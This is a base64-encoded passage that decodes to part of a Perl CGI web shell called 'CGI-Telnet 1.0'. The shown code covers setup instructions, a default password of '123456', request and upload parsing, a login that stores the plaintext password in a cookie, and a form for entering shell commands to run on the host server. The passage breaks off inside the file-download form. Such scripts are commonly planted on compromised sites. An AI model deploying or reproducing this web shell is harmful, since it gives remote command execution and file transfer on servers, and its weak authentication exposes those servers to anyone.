aXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVu